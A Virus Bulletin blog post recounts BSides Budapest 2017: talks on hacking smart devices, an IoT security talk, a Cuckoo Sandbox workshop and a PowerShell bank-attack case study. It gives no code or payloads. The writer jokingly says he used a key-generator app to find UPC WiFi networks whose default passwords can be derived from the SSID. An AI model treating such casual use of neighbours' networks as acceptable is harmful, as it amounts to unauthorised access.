Quick impressions from BSides Budapest

Posted by    on   Mar 8, 2017

At Virus Bulletin, we love the BSides concept and we have attended several of the BSides events around the world. So when Peter Karsai, who is soon to join the VB team, offered to write something about his experience at BSides Budapest, we jumped at the chance to publish his post.

 

Growing up in Eastern Europe during the final years of the Soviet bloc, my primary connection to the West was through the VCR: bootlegged Hollywood movies from Germany, copied a hundred times, with ridiculous home-brewed Hungarian voiceover, over German voiceover, over Mr. Miyagi from The Karate Kid. It was our esteemed family VCR that first introduced me to the concept of "economies of scale": when the light fell at the right angle, the built-in display revealed placeholder symbols for functions not available in our entry-level model. I was startled, so my brother took up the duty of explaining that it is often cheaper to produce zillions of the same device and let some functionality lie unused in some of them than it is to manufacture a custom device for individual models. When setup costs are high, producing many of the same brings your per-item costs down. He added that this is called "economies of scale" – because that's exactly the sort of term an eight-year-old finds indispensable in his daily adventures.

 

512px-Vacuum_fluorescent_1.jpg

A vacuum fluorescent display from a typical VCR.
By Atlant assumed (based on copyright claims). [GFDL, CC-BY-SA-3.0 or CC BY 2.5], via Wikimedia Commons

 

Fast forward to 2017 and BSides Budapest, and Tobias Schrödel's presentation on smart device hacking gave a glaring example of this concept at work. He started his demonstration by showing the audience how to hack a camera-equipped RC car and enable HD camera resolution for the cheaper, SD-only variant of the toy car. Economies of scale: when setting up and changing production lines is expensive, and software configuration is cheap, it actually makes a lot of sense for the vendor to cut costs through software and not to be too concerned about plunging sales of the HD version among hacker types. However, cost efficiency and a lack of concern can be a lot more damaging when it results in a complete disregard for basic security. Much to the amusement of the audience, Tobias demonstrated this vividly by hijacking a camera-equipped adult toy (yes, it's a thing), and then just to wrap the show up he gave a handy demo of how to bring a big stage light show to your neighbour by hacking their smart lightbulbs (which is only fair payback for using the angle grinder at 7AM on a Sunday morning, I suppose).

The presentation given by Zoltán Balázs of MRG Effitas on IoT device security – and the lack thereof – only reinforced the message that vendors really need to get their act together on this front, no matter the pressure from the market to ship fast and early. Mirai, anyone?

Feeling that these two presentations had warmed me up sufficiently for more serious work, I joined the workshop on Cuckoo Sandbox custom module development. Note to self: take an intermediate subject only after your understanding of the basics is fairly solid.

via GIPHY Artist's impression of my understanding following "Welcome to the Cuckoo workshop".

The coffee breaks between conference sessions allowed for a little chat amongst fellow attendees; I loved these as much as the presentations themselves. For instance, somebody casually showed me how one could get, er, free WiFi from certain cable modems on the UPC network. This is actually a fun one: turns out that the default WiFi password of certain Ubee modems that UPC commonly deploys for consumers can be guessed from the advertised SSID. This has been a known issue for several months now, yet I had no difficulty whatsoever in finding vulnerable WiFi networks when I tried the key generator app – so maybe this is less a 'fun one' and more a 'holy macaroni!' one.

 

routerkeygen-yolosec.png

 

Returning from lunch, I just managed to catch Jeff Hamm's presentation on the attack and forensics arsenal offered by PowerShell and his case study on how PowerShell was utilised in a successful attack against a bank, eventually gaining the attacker access to the SWIFT subsystem and the ability to transfer money out, before destroying the systems affected. You can't say that it's called PowerShell for no reason, right?

I had to leave a bit prematurely, but the first BSides Budapest left me with very good impressions. Kudos to the organisers and sponsors for bringing together a wide variety of talks for security professionals and enthusiasts alike. And on my way home I might have won them another attendee for next year: the cab driver listened quite intently to my stories from the infosec world and said he would totally consider a second career in this area. If only it hadn't happened right after explaining ransomware-as-service – I can only hope this was responsible disclosure. See you at the next #BSidesBUD event, blackhat cab driver!

BSides-small_logo_website.jpg

twitter.png
fb.png
linkedin.png
hackernews.png
reddit.png

 

Latest posts:

VB2019 paper: APT cases exploiting vulnerabilities in region-specific software

At VB2019, JPCERT/CC's Shusei Tomonaga and Tomoaki Tani presented a paper on attacks that exploit vulnerabilities in software used only in Japan, using malware that is unique to Japan. Today we publish both their paper and the recording of their…

New paper: Detection of vulnerabilities in web applications by validating parameter integrity and data flow graphs

In a follow-up to a paper presented at VB2019, Prismo Systems researchers Abhishek Singh and Ramesh Mani detail algorithms that can be used to detect SQL injection in stored procedures, persistent cross-site scripting (XSS), and server‑side request…

VB2020 programme announced

VB is pleased to reveal the details of an interesting and diverse programme for VB2020, the 30th Virus Bulletin International Conference.

VB2019 paper: Cyber espionage in the Middle East: unravelling OSX.WindTail

At VB2019 in London, Jamf's Patrick Wardle analysed the WindTail macOS malware used by the WindShift APT group, active in the Middle East. Today we publish both Patrick's paper and the recording of his presentation.

VB2019 paper: 2,000 reactions to a malware attack – accidental study

At VB2019 cybercrime journalist and researcher Adam Haertlé presented an analysis of almost 2000 unsolicited responses sent by victims of a malicious email campaign. Today we publish both his paper and the recording of his presentation.

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.